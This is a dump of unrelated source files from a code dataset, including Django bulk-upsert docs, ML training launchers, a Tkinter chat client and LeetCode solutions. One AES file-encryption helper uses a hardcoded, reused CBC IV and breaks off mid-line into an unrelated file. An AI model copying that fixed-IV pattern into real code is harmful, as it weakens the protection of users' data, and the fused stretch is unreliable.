examples below.\n returning (bool|List[str], default=False): If True, returns all fields.\n If a list, only returns fields in the list. If False, do not\n return results from the upsert.\n ignore_duplicate_updates (bool, default=True): Don't perform an update\n if all columns are identical to the row in the database.\n return_untouched (bool, default=False): When\n ``ignore_duplicate_updates`` is ``True``, untouched rows will not\n be returned in upsert results. 
Set this to ``True`` to return\n untouched rows.\n\n Examples:\n A basic bulk upsert on a model::\n\n import pgbulk\n\n pgbulk.upsert(\n MyModel,\n [\n MyModel(int_field=1, some_attr='some_val1'),\n MyModel(int_field=2, some_attr='some_val2')\n ],\n # These are the fields that identify the uniqueness constraint.\n ['int_field'],\n # These are the fields that will be updated if the row already\n # exists. If not provided, all fields will be updated\n ['some_attr']\n )\n\n Return the results of an upsert::\n\n results = pgbulk.upsert(\n MyModel,\n [\n MyModel(int_field=1, some_attr='some_val1'),\n MyModel(int_field=2, some_attr='some_val2')\n ],\n ['int_field'],\n ['some_attr'],\n # ``True`` will return all columns. One can also explicitly\n # list which columns will be returned\n returning=True\n )\n\n # Print which results were created\n print(results.created)\n\n # Print which results were updated.\n # By default, if an update results in no changes, it will not\n # be updated and will not be returned.\n print(results.updated)\n\n Upsert values and update rows even when the update is meaningless\n (i.e. a duplicate update). This is turned off by default, but it\n can be enabled in case postgres triggers or other processes\n need to happen as a result of an update::\n\n pgbulk.upsert(\n MyModel,\n [\n MyModel(int_field=1, some_attr='some_val1'),\n MyModel(int_field=2, some_attr='some_val2')\n ],\n ['int_field'],\n ['some_attr'],\n # Perform updates in the database even if it's a duplicate\n # update.\n ignore_duplicate_updates=False\n )\n\n Upsert values and ignore duplicate updates, but still return\n the rows that were untouched by the upsert::\n\n results = pgbulk.upsert(\n MyModel,\n [\n MyModel(int_field=1, some_attr='some_val1'),\n MyModel(int_field=2, some_attr='some_val2')\n ],\n ['int_field'],\n ['some_attr'],\n returning=True,\n # Even though we don't perform an update on a duplicate,\n # return the row that was part of the upsert but untouched\n # This option is only meaningful when\n # ignore_duplicate_updates=True (the default)\n return_untouched=True,\n )\n\n # Print untouched rows\n print(results.untouched)\n\n Use an expression for a field if an update happens. In the example\n below, we increment ``some_int_field`` by one whenever an update happens.\n Otherwise it defaults to zero::\n\n results = pgbulk.upsert(\n MyModel,\n [\n MyModel(some_int_field=0, some_key='a'),\n MyModel(some_int_field=0, some_key='b')\n ],\n ['some_key'],\n [\n # Use the UpdateField class to specify an expression for the update.\n # If provided, the expression will be executed when an update happens.\n pgbulk.UpdateField('some_int_field', expression=models.F('some_int_field') + 1)\n ],\n )\n\n \"\"\"\n return _upsert(\n queryset,\n model_objs,\n unique_fields,\n update_fields=update_fields,\n returning=returning,\n ignore_duplicate_updates=ignore_duplicate_updates,\n return_untouched=return_untouched,\n sync=False,\n )\n\n\ndef sync(\n queryset,\n model_objs,\n unique_fields,\n update_fields=None,\n returning=False,\n ignore_duplicate_updates=True,\n return_untouched=False,\n):\n \"\"\"\n Perform a bulk sync on a table. A sync is an upsert on a list of model\n objects followed by a delete on the queryset whose elements were not\n in the list of models.\n\n Args:\n queryset (Model|QuerySet): A model or a queryset that defines the\n collection to sync. If a model is provided, all rows are\n candidates for the sync operation\n model_objs (List[Model]): A list of Django models to sync. 
All models\n in this list will be bulk upserted. Any models in the queryset\n that are not present in this list will be deleted.\n unique_fields (List[str]): A list of fields that define the uniqueness\n of the model. The model must have a unique constraint on these\n fields\n update_fields (List[str], default=None): A list of fields to update\n whenever objects already exist. If an empty list is provided, it\n is equivalent to doing a bulk insert on the objects that don't\n exist. If `None`, all fields will be updated.\n returning (bool|List[str]): If True, returns all fields. If a list,\n only returns fields in the list\n ignore_duplicate_updates (bool, default=True): Don't perform an update\n if the row is a duplicate.\n\n Examples:\n Sync two elements to a table with three elements. The sync will\n upsert two elements and delete the third::\n\n # Assume the MyModel table has objects with int_field=1,2,3\n # We will sync this table to two elements\n results = pgbulk.sync(\n MyModel.objects.all(),\n [\n MyModel(int_field=1, some_attr='some_val1'),\n MyModel(int_field=2, some_attr='some_val2')\n ],\n ['int_field'],\n ['some_attr'],\n )\n\n # Print created, updated, untouched, and deleted rows from the sync\n print(results.created)\n print(results.updated)\n print(results.untouched)\n print(results.deleted)\n \"\"\"\n return _upsert(\n queryset,\n model_objs,\n unique_fields,\n update_fields=update_fields,\n returning=returning,\n ignore_duplicate_updates=ignore_duplicate_updates,\n sync=True,\n )\n","sub_path":"pgbulk/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":26131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"581197370","text":"import random\nfrom dolfin import *\n\nclass InitialConditions(Expression):\n def __init__(self):\n random.seed(2 + MPI.process_number())\n def eval(self, values, x):\n values[0] = 0.63 + 0.02*(0.5 - random.random())\n\nmesh = RectangleMesh(0, 0, 2, 2, 150, 150, \"crossed\")\nV = FunctionSpace(mesh, \"Lagrange\", 1)\n\nic = interpolate(InitialConditions(), V)\nFile(\"random_ic.xml.gz\") << ic\n","sub_path":"cahn_hilliard/gen_ic.py","file_name":"gen_ic.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"316978631","text":"import dataclasses\nfrom abc import ABC, abstractmethod\nfrom typing import Any, ClassVar, Dict, Generic, Iterable, List, Tuple, Type, TypeVar, Union\n\nfrom esque.io.exceptions import EsqueIOHandlerConfigException\nfrom esque.io.messages import BinaryMessage\nfrom esque.io.stream_events import PermanentEndOfStream, StreamEvent\n\nH = TypeVar(\"H\", bound=\"BaseHandler\")\nHC = TypeVar(\"HC\", bound=\"HandlerConfig\")\n\n\n@dataclasses.dataclass(frozen=True)\nclass HandlerConfig:\n host: str\n path: str\n scheme: str\n\n def __post_init__(self):\n self._validate()\n\n def _validate(self):\n problems: List[str] = self._validate_fields()\n if problems:\n raise EsqueIOHandlerConfigException(\"Handler config validation failed: \\n\" + \"\\n\".join(problems))\n\n def _validate_fields(self) -> List[str]:\n problems = []\n if self.host is None:\n problems.append(\"host cannot be None\")\n if self.path is None:\n problems.append(\"path cannot be None\")\n if self.scheme is None:\n problems.append(\"scheme cannot be None\")\n return problems\n\n\nclass BaseHandler(ABC, Generic[HC]):\n\n config_cls: ClassVar[Type[HC]] = HandlerConfig\n config: HC\n\n def __init__(self, config: 
HC):\n \"\"\"\n Base class for all Esque IO handlers. A handler is responsible for writing and reading messages\n to and from a source. The handler is unaware of the underlying message's format and treats all\n sources as binary. It may support persisting the serializer config for easier data retrieval.\n\n :param config:\n \"\"\"\n self.config = config\n self._assert_correct_config_type()\n\n def _assert_correct_config_type(self):\n if not isinstance(self.config, self.config_cls):\n raise EsqueIOHandlerConfigException(\n f\"Invalid type for the handler config. \"\n f\"Expected: {self.config_cls.__name__}, \"\n f\"provided: {type(self.config).__name__}\"\n )\n\n @abstractmethod\n def seek(self, position: int):\n \"\"\"\n Seek the handler's reading position to the given offset for all partitions. The next message that is read will\n be at this offset if it is still available and after this offset if and only if it is not available anymore.\n\n :param position: The offset to seek to\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def get_serializer_configs(self) -> Tuple[Dict[str, Any], Dict[str, Any]]:\n \"\"\"\n Retrieves the serializer config from this handler's source, if possible.\n Implementations should raise an :class:`esque.io.exceptions.EsqueIOSerializerConfigNotSupported`\n if this operation is not supported for a particular\n handler.\n\n :return: Tuple of dictionaries containing the configs for the key and value serializer\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def put_serializer_configs(self, config: Tuple[Dict[str, Any], Dict[str, Any]]) -> None:\n \"\"\"\n Persists the serializer config in this handler's source, if possible.\n Implementations should raise an :class:`esque.io.exceptions.EsqueIOSerializerConfigNotSupported`\n if this operation is not supported for a particular\n handler.\n\n :param config: Tuple of dictionaries containing the configs for the key and value serializer\n \"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def write_message(self, binary_message: Union[BinaryMessage, StreamEvent]) -> None:\n \"\"\"\n Write the message from `binary_message` to this handler's source.\n The handler may choose which action to take upon receiving any :class:`StreamEvent`\n instances but mostly the appropriate action is to just ignore them.\n\n :param binary_message: The message that is supposed to be written.\n \"\"\"\n raise NotImplementedError\n\n def write_many_messages(self, message_stream: Iterable[Union[BinaryMessage, StreamEvent]]) -> None:\n \"\"\"\n Write all messages from the iterable `message_stream` to this handler's source.\n The handler may choose which action to take upon receiving any :class:`StreamEvent`\n instances but mostly the appropriate action is to just ignore them.\n\n :param message_stream: The messages that are supposed to be written.\n \"\"\"\n for binary_message in message_stream:\n self.write_message(binary_message)\n\n @abstractmethod\n def read_message(self) -> Union[BinaryMessage, StreamEvent]:\n \"\"\"\n Read the next :class:`BinaryMessage` from this handler's source.\n Returns an object of :class:`StreamEvent` to indicate certain events that may happen while reading from the\n source.\n For example if the handler has reached a permanent end, like the end of a file or a closed stream, then\n it will return a :class:`PermanentEndOfStream` object.\n If the handler has reached a temporary end (e.g. 
the end of a topic was reached but new messages might come in\n        at some point) then it will return an object of :class:`TemporaryEndOfStream`.\n        Both of these classes are subclasses of :class:`EndOfStream`.\n\n        :return: The next message from this handler's source, or a stream event.\n        :raises EsqueIOHandlerReadException: When there was a failure accessing the source. Like a broken pipe.\n        \"\"\"\n        raise NotImplementedError\n\n    def binary_message_stream(self) -> Iterable[Union[BinaryMessage, StreamEvent]]:\n        \"\"\"\n        Read :class:`BinaryMessage`s from this handler's source until the source's permanent end is reached.\n        Yields an object of :class:`StreamEvent` to indicate certain events that may happen while reading from the\n        source.\n        For example if the handler has reached a permanent end, like the end of a file or a closed stream, then\n        it will return a :class:`PermanentEndOfStream` object.\n        If the handler has reached a temporary end (e.g. the end of a topic was reached but new messages might come in\n        at some point) then it will return an object of :class:`TemporaryEndOfStream`.\n        Both of these classes are subclasses of :class:`EndOfStream`.\n\n        The last object returned before the iterable ends is always an instance of :class:`PermanentEndOfStream`.\n\n        :raises EsqueIOHandlerReadException: When there was a failure accessing the source. Like a broken pipe.\n        :returns: Iterable yielding all messages from this handler's source until a permanent end was reached.\n        \"\"\"\n        while True:\n            msg = self.read_message()\n            yield msg\n            if isinstance(msg, PermanentEndOfStream):\n                break\n\n    @abstractmethod\n    def close(self) -> None:\n        \"\"\"\n        Close all resources that have been opened by this handler.\n        \"\"\"\n        raise NotImplementedError\n","sub_path":"esque/io/handlers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"2530382","text":"import sys\nimport urllib2\nfrom StringIO import StringIO\nfrom zipfile import ZipFile\n\nperms = []\nsubs = set()\n\ndef swap(string,a,b):\n\t\"\"\"\tHelper function for perm \"\"\" \n\ttemp = list(string)\n\ttemp[a],temp[b] = temp[b],temp[a]\n\treturn \"\".join(temp)\n\ndef perm(string,i=0):\n\t\"\"\" Finds all possible permutations from input string\n\t\tcomplexity ~ O(N!)\n\t\"\"\"\n\tif i == len(string)-1:\n\t\tperms.append(string)\n\telse:\n\t\tfor j in range(i,len(string)):\n\t\t\tstring = swap(string,i,j)\n\t\t\tperm(string,i+1)\n\t\t\tstring = swap(string,i,j)\n\ndef substr(string):\n\t\"\"\" Finds all possible substrings from input string\n\t\tand throws them in a set to eliminate duplicates.\n\t\tcomplexity ~ O(2^N)\n\t\"\"\"\n\tglobal subs\n\ti = 1\n\twhile True:\n\t\tfor j in range(len(string)-i+1):\n\t\t\tsubs.add(string[j:j+i])\n\t\tif i == len(string):\n\t\t\tbreak\n\t\ti += 1\n\nif __name__ == '__main__':\n\tif len(sys.argv) != 2:\n\t\tprint(\">> Usage: jumbler.py <string>\")\n\t\tsys.exit(0)\n\tstring = str(sys.argv[1])\n\tif not string.isalpha():\n\t\tprint(\">> Error: '%s' is not a string\" % string)\n\t\tsys.exit(0)\n\tprint(\">> Dissecting '%s'\" % string)\n\n\t#find all permutations then all their substrings\n\tperm(string)\n\tfor x in perms:\n\t\tsubstr(x)\n\n\t#load the dictionary into memory\n\tprint(\">> Loading Kevin's Automatically Generated Inflection Database (wordlist.sourceforge.net) into memory...\")\n\tbaseURL = \"http://downloads.sourceforge.net/wordlist/\"\n\tfilename = \"agid-4.zip\"\n\n\tresponse = 
urllib2.urlopen(baseURL + filename)\n\tmyFile = ZipFile(StringIO(response.read()))\n\n\tword_list = []\n\tfor line in myFile.open(\"infl.txt\").readlines():\n\t\tword_list.append(line[:line.find(' ')])\n\n\t#intersect wordlist and set of all substrings\n\tresults = list(subs & set(word_list))\n\tprint(\">> Woah! We found %s words:\" % str(len(results)))\n\tprint(results)\n","sub_path":"jumbler.py","file_name":"jumbler.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"369220259","text":"import pickle\n\nimport rlkit.torch.pytorch_util as ptu\nfrom multiworld.core.flat_goal_env import FlatGoalEnv\nfrom rlkit.data_management.obs_dict_replay_buffer import \\\n ObsDictRelabelingBuffer\nfrom rlkit.data_management.her_replay_buffer import RelabelingReplayBuffer\nfrom rlkit.envs.multitask.multitask_env import \\\n MultitaskEnvToSilentMultitaskEnv, MultiTaskHistoryEnv\nfrom rlkit.envs.wrappers import NormalizedBoxEnv\nfrom rlkit.exploration_strategies.base import (\n PolicyWrappedWithExplorationStrategy\n)\nfrom rlkit.exploration_strategies.epsilon_greedy import EpsilonGreedy\nfrom rlkit.exploration_strategies.gaussian_strategy import GaussianStrategy\nfrom rlkit.exploration_strategies.ou_strategy import OUStrategy\nfrom rlkit.torch.networks import ConcatMlp, TanhMlpPolicy\nfrom rlkit.torch.sac.policies import TanhGaussianPolicy\nfrom rlkit.state_distance.tdm_networks import TdmQf, TdmPolicy\n# from rlkit.torch.her.her_twin_sac import HerTwinSac\n# from rlkit.torch.her.her_sac import HerSac\n\nfrom rlkit.state_distance.tdm_td3 import TdmTd3\nfrom rlkit.misc.ml_util import IntPiecewiseLinearSchedule\n\n\ndef tdm_td3_experiment(variant):\n variant['env_kwargs'].update(variant['reward_params'])\n env = variant['env_class'](**variant['env_kwargs'])\n\n multiworld_env = variant.get('multiworld_env', True)\n\n if multiworld_env is not True:\n env = MultitaskEnvToSilentMultitaskEnv(env)\n if variant[\"render\"]:\n env.pause_on_goal = True\n\n if variant['normalize']:\n env = NormalizedBoxEnv(env)\n\n exploration_type = variant['exploration_type']\n if exploration_type == 'ou':\n es = OUStrategy(\n action_space=env.action_space,\n max_sigma=0.1,\n **variant['es_kwargs']\n )\n elif exploration_type == 'gaussian':\n es = GaussianStrategy(\n action_space=env.action_space,\n max_sigma=0.1,\n min_sigma=0.1, # Constant sigma\n **variant['es_kwargs'],\n )\n elif exploration_type == 'epsilon':\n es = EpsilonGreedy(\n action_space=env.action_space,\n prob_random_action=0.1,\n **variant['es_kwargs'],\n )\n else:\n raise Exception(\"Invalid type: \" + exploration_type)\n if multiworld_env is True:\n obs_dim = env.observation_space.spaces['observation'].low.size\n action_dim = env.action_space.low.size\n goal_dim = env.observation_space.spaces['desired_goal'].low.size\n else:\n obs_dim = action_dim = goal_dim = None\n vectorized = 'vectorized' in env.reward_type\n variant['algo_kwargs']['tdm_kwargs']['vectorized'] = vectorized\n\n norm_order = env.norm_order\n variant['algo_kwargs']['tdm_kwargs']['norm_order'] = norm_order\n\n qf1 = TdmQf(\n env=env,\n observation_dim=obs_dim,\n action_dim=action_dim,\n goal_dim=goal_dim,\n vectorized=vectorized,\n norm_order=norm_order,\n **variant['qf_kwargs']\n )\n qf2 = TdmQf(\n env=env,\n observation_dim=obs_dim,\n action_dim=action_dim,\n goal_dim=goal_dim,\n vectorized=vectorized,\n norm_order=norm_order,\n **variant['qf_kwargs']\n )\n policy = TdmPolicy(\n env=env,\n 
observation_dim=obs_dim,\n action_dim=action_dim,\n goal_dim=goal_dim,\n **variant['policy_kwargs']\n )\n exploration_policy = PolicyWrappedWithExplorationStrategy(\n exploration_strategy=es,\n policy=policy,\n )\n\n relabeling_env = pickle.loads(pickle.dumps(env))\n\n algo_kwargs = variant['algo_kwargs']\n\n if multiworld_env is True:\n observation_key = variant.get('observation_key', 'state_observation')\n desired_goal_key = variant.get('desired_goal_key', 'state_desired_goal')\n achieved_goal_key = variant.get('achieved_goal_key', 'state_achieved_goal')\n replay_buffer = ObsDictRelabelingBuffer(\n env=relabeling_env,\n observation_key=observation_key,\n desired_goal_key=desired_goal_key,\n achieved_goal_key=achieved_goal_key,\n vectorized=vectorized,\n **variant['replay_buffer_kwargs']\n )\n algo_kwargs['tdm_kwargs']['observation_key'] = observation_key\n algo_kwargs['tdm_kwargs']['desired_goal_key'] = desired_goal_key\n else:\n replay_buffer = RelabelingReplayBuffer(\n env=relabeling_env,\n **variant['replay_buffer_kwargs']\n )\n\n # qf_criterion = variant['qf_criterion_class']()\n # algo_kwargs['td3_kwargs']['qf_criterion'] = qf_criterion\n algo_kwargs['td3_kwargs']['training_env'] = env\n if 'tau_schedule_kwargs' in variant:\n tau_schedule = IntPiecewiseLinearSchedule(**variant['tau_schedule_kwargs'])\n else:\n tau_schedule = None\n algo_kwargs['tdm_kwargs']['epoch_max_tau_schedule'] = tau_schedule\n\n algorithm = TdmTd3(\n env,\n qf1=qf1,\n qf2=qf2,\n policy=policy,\n exploration_policy=exploration_policy,\n replay_buffer=replay_buffer,\n **variant['algo_kwargs']\n )\n if ptu.gpu_enabled():\n qf1.to(ptu.device)\n qf2.to(ptu.device)\n policy.to(ptu.device)\n algorithm.to(ptu.device)\n algorithm.train()","sub_path":"rlkit/launchers/experiments/soroush/multiworld_tdm.py","file_name":"multiworld_tdm.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"456225158","text":"# coding=utf-8\nimport logging\nimport urlparse\nfrom zipfile import ZipFile\n\nfrom PyQt4.QtCore import QTemporaryFile\n\nfrom resource_sharing.repository_handler.base import BaseRepositoryHandler\nfrom resource_sharing.utilities import local_collection_path\nfrom resource_sharing.network_manager import NetworkManager\n\n\nLOGGER = logging.getLogger('QGIS Resources Sharing')\n\n\nclass RemoteZipHandler(BaseRepositoryHandler):\n \"\"\"Class to handle remote zip repository.\"\"\"\n IS_DISABLED = False\n\n def __init__(self, url):\n \"\"\"Constructor.\"\"\"\n BaseRepositoryHandler.__init__(self, url)\n\n def can_handle(self):\n if not self.is_git_repository:\n if self._parsed_url.scheme in ['http', 'https']:\n return True\n return False\n\n def fetch_metadata(self):\n \"\"\"Fetch metadata file from the url.\"\"\"\n # Download the metadata\n network_manager = NetworkManager(self.metadata_url, self.auth_cfg)\n status, description = network_manager.fetch()\n if status:\n self.metadata = network_manager.content\n return status, description\n\n def download_collection(self, id, register_name):\n \"\"\"Download a collection given its ID.\n\n For zip collection, we will download the zip, and extract the\n collection to collections dir.\n\n :param id: The ID of the collection.\n :type id: str\n\n :param register_name: The register name of the collection (the\n section name of the collection)\n :type register_name: unicode\n \"\"\"\n # Download the zip first\n collection_path = 'collections/%s.zip' % register_name\n network_manager = 
NetworkManager(self.file_url(collection_path))\n        status, description = network_manager.fetch()\n\n        if not status:\n            return False, description\n\n        # Create the zip file\n        zip_file = QTemporaryFile()\n        if zip_file.open():\n            zip_file.write(network_manager.content)\n            zip_file.close()\n\n            zf = ZipFile(zip_file.fileName())\n            zf.extractall(path=local_collection_path(id))\n            return True, None\n\n    def file_url(self, relative_path):\n        return urlparse.urljoin(self.url, relative_path)\n","sub_path":"resource_sharing/repository_handler/remote_zip_handler.py","file_name":"remote_zip_handler.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"275436660","text":"import numpy as np\n\n\ndef add(A, B):\n    # sum of two matrices\n    assert len(A) == len(B)\n    assert len(A[0]) == len(B[0])\n\n    n = len(A)\n    m = len(A[0])\n\n    C = zeroes(n, m)\n\n    for i in range(n):\n        for j in range(m):\n            C[i][j] = A[i][j] + B[i][j]\n    return C\n\n\ndef subtract(A, B):\n    # difference of two matrices\n    assert len(A) == len(B)\n    assert len(A[0]) == len(B[0])\n\n    n = len(A)\n    m = len(A[0])\n\n    C = zeroes(n, m)\n\n    for i in range(n):\n        for j in range(m):\n            C[i][j] = A[i][j] - B[i][j]\n    return C\n\n\ndef zeroes(n):\n    # list of length n, filled with zeros\n    return [0.] * n\n\n\ndef zeroes(n, m):\n    # zero matrix n*m\n    return [([0.] * m).copy() for i in range(n)]\n\n\ndef ident_matrix(n):\n    # returns a square identity matrix\n    A = zeroes(n, n)\n    for i in range(n):\n        A[i][i] = 1\n    return A\n\n\ndef mul(A, B):\n    # product of two matrices\n    assert len(A[0]) == len(B)\n    l = len(A)\n    m = len(A[0])\n    n = len(B[0])\n    C = zeroes(l, n)\n    for i in range(l):\n        for j in range(n):\n            summ = 0\n            for r in range(m):\n                summ += A[i][r] * B[r][j]\n            C[i][j] = summ\n    return C\n\n\ndef transpose(A):\n    # matrix transposition\n    height = len(A)\n    width = len(A[0])\n    return [[A[row][col] for row in range(0, height)] for col in range(0, width)]\n\n\ndef norm(A):\n    # c-norm of the matrix\n    # sum of the elements of the maximal row\n    n = len(A)\n    m = len(A[0])\n    ret = 0\n    for i in range(n):\n        summ = 0\n        for j in range(m):\n            summ += abs(A[i][j])\n        ret = max(ret, summ)\n    return ret\n\n\ndef norm1(A):\n    # norm of the matrix\n    # sum of the elements of the maximal column\n    n = len(A)\n    m = len(A[0])\n    ret = 0\n    for i in range(m):\n        summ = 0\n        for j in range(n):\n            summ += abs(A[j][i])\n        ret = max(ret, summ)\n    return ret\n\n\ndef norm2(A):\n    # Euclidean norm of the matrix\n    # (the 2-norm)\n    n = len(A)\n    m = len(A[0])\n    summ = 0\n    for i in range(n):\n        for j in range(m):\n            summ += A[i][j] ** 2\n    return summ ** 0.5\n\n\ndef vector_norm(v):\n    # returns the Euclidean norm of a vector\n    summ = 0\n    for elem in v:\n        summ += elem ** 2\n    return summ ** 0.5\n\n\ndef format(A):\n    # formatted \"pretty\" output of a matrix\n    return np.array(A)\n\n\ndef copy(A):\n    # returns a copy of the matrix\n    return [x.copy() for x in A]\n","sub_path":"matrix_transformations.py","file_name":"matrix_transformations.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"331146543","text":"# Valentina Neblitt-Jones\n# CS 595 Introduction to Web Science\n# Fall 2013\n# Assignment #7 Question #1\n\nimport json\nimport pprint\n\ng = open('zachary1.json', 'w')\npp = pprint.PrettyPrinter()\n\nadict = {}\nadict[\"nodes\"] = []\nadict[\"links\"] = []\n\nid = 0 # name\n\nwith open('zachary.dat', 'r') as f:\n    good = f.readlines()[41:]\nfor line in 
good:\n\tperson = line.split()\n\tid = id + 1 # generates name\n\tadict[\"nodes\"].append({'id':str(id)})\n\tfor i in range(0, len(person)):\n\t\tweight = int(person[i])\n\t\tsource = id - 1\n\t\ttarget = i\n\t\tif weight != 0:\n\t\t\tadict[\"links\"].append({'source': source, 'target': target, 'weight':weight})\n\t\t\t\npp.pprint(adict)\noutput = json.dumps(adict, indent=4)\ng.write(output)\n\nf.close()\ng.close()\n \n","sub_path":"assignment07/q1/CreateJSONFile01.py","file_name":"CreateJSONFile01.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"218511313","text":"# -*- coding: utf-8 -*-\r\nimport threading\r\nimport sys\r\nreload(sys)\r\nsys.setdefaultencoding('utf-8')\r\n\r\nfrom engine import Engine\r\nimport settings\r\n\r\nclass Controller(threading.Thread):\r\n    def __init__(self):\r\n        threading.Thread.__init__(self)\r\n        # whether to update\r\n        # False means download the links in url_queue, True means update\r\n        self.run_list=[False,True]\r\n        self.run_sqe=0\r\n        self.engine_is_running=False\r\n        \r\n    def run(self):\r\n        '''Run in a loop'''\r\n        self.is_running=True\r\n        # set the run type\r\n        self.is_update=self.run_list[self.run_sqe]\r\n        settings.S_is_update=self.is_update\r\n\r\n        self.eng=Engine(settings.S_target_website)\r\n        self.eng.start()\r\n        \r\n        self.run_sqe+=1\r\n        if self.run_sqe>=len(self.run_list):\r\n            self.run_sqe=0\r\n        \r\n        self.engine_is_running=True\r\n        self.eng.join()\r\n        if self.is_running:\r\n            self.run()\r\n        \r\n    def stop(self):\r\n        self.eng.is_running=False\r\n        self.is_running=False\r\n        \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"mycode/python/pachong/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"79633201","text":"import os, struct\r\nfrom Crypto.Cipher import AES\r\n\r\ndef encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):\r\n    if not out_filename:\r\n        out_filename = 'uploads/'+in_filename + '.enc'\r\n\r\n    iv = '1234561234561234'\r\n    encryptor = AES.new(key.encode('utf-8'), AES.MODE_CBC, iv.encode('utf-8'))\r\n    filesize = os.path.getsize(in_filename)\r\n    \r\n    with open(in_filename, 'rb') as infile:\r\n        with open('uploads/'+out_filename, 'wb') as outfile:\r\n            outfile.write(struct.pack('<Q', filesize))\n        self.listbox.bind(\"<Double-Button-1>\", self.new_chat_with)\n        self.center_window()\n\n    def center_window(self):\n\n        w = 290\n        h = 150\n\n        sw = self.parent.winfo_screenwidth()\n        sh = self.parent.winfo_screenheight()\n\n        x = (sw - w) / 2\n        y = (sh - h) / 2\n        self.parent.geometry('%dx%d+%d+%d' % (w, h, x, y))\n\n    def self_update(self):\n        if not self.client.active:\n            self.active = False\n            self.listbox.delete(0, END)\n            self.listbox.insert(END, 'No connection to master server')\n            self.listbox.bind(\"<Double-Button-1>\", '')\n            self.listbox.config(state='disabled')\n            for window in self.opened_chat_windows:\n                window.button.config(state='disabled')\n\n        time.sleep(0.2)\n        if not self.old_list == self.client.client_list:\n            self.listbox.delete(0, END)\n            for client in self.client.client_list:\n                self.listbox.insert(END, client[0])\n            self.old_list = self.client.client_list[:]\n\n        try:\n            message = self.client.messages.get_nowait()\n            for client in self.client.client_list:\n                if client[1] == message['address']:\n                    chat_window = self.recieve_new_chat(client)\n                    time.sleep(0.1)\n                    chat_window.print_message(str(message['text'], 'utf8'))\n\n        except queue.Empty:\n            pass\n\n        self.parent.after(100, self.self_update)\n\n    def new_chat_with(self, e):\n        if not 
self.listbox.curselection():\n return\n user = self.client.client_list[int(self.listbox.curselection()[0])]\n for opened_chat in self.opened_chat_windows:\n if opened_chat.user == user:\n if opened_chat.hidden:\n opened_chat.parent.deiconify()\n return opened_chat\n\n new_window = Toplevel()\n new_chat = ChatWindow(new_window, self, user=user)\n self.opened_chat_windows.append(new_chat)\n return new_chat\n\n def recieve_new_chat(self, user):\n for opened_chat in self.opened_chat_windows:\n if opened_chat.user == user:\n return opened_chat\n\n new_window = Toplevel()\n new_chat = ChatWindow(new_window, self, user=user)\n self.opened_chat_windows.append(new_chat)\n return new_chat\n\n def shutdown(self):\n self.active = False\n self.client.active = False\n self.parent.destroy()\n","sub_path":"GUI/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"445616429","text":"\"\"\"\n122. Best Time to Buy and Sell Stock II\nEasy\n\nSay you have an array for which the ith element is the price of a given stock on day i.\n\nDesign an algorithm to find the maximum profit. You may complete as many transactions as you like (i.e., buy one and sell one share of the stock multiple times).\n\nNote: You may not engage in multiple transactions at the same time (i.e., you must sell the stock before you buy again).\n\nExample 1:\n\nInput: [7,1,5,3,6,4]\nOutput: 7\nExplanation: Buy on day 2 (price = 1) and sell on day 3 (price = 5), profit = 5-1 = 4.\n Then buy on day 4 (price = 3) and sell on day 5 (price = 6), profit = 6-3 = 3.\n\nExample 2:\n\nInput: [1,2,3,4,5]\nOutput: 4\nExplanation: Buy on day 1 (price = 1) and sell on day 5 (price = 5), profit = 5-1 = 4.\n Note that you cannot buy on day 1, buy on day 2 and sell them later, as you are\n engaging multiple transactions at the same time. You must sell before buying again.\n\nExample 3:\n\nInput: [7,6,4,3,1]\nOutput: 0\nExplanation: In this case, no transaction is done, i.e. max profit = 0.\n\"\"\"\n\nfrom typing import List\n\n###############################################################################\n\"\"\"\nSolution 1: Add up all price increases.\n\nO(n) time\nO(1) extra space\n\"\"\"\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n n = len(prices)\n profit = 0\n\n for i in range(1, n):\n if prices[i] > prices[i-1]:\n profit += prices[i] - prices[i-1]\n\n #profit += max(0, prices[i] - prices[i-1])\n\n return profit\n\nclass Solution1b:\n def maxProfit(self, prices: List[int]) -> int:\n return sum(max(prices[i+1] - prices[i], 0) for i in range(len(prices) - 1))\n\nclass Solution1c:\n def maxProfit(self, prices: List[int]) -> int:\n return sum([b - a for a, b in zip(prices, prices[1:]) if b - a > 0])\n\n###############################################################################\n\"\"\"\nSolution 2: greedy approach. 
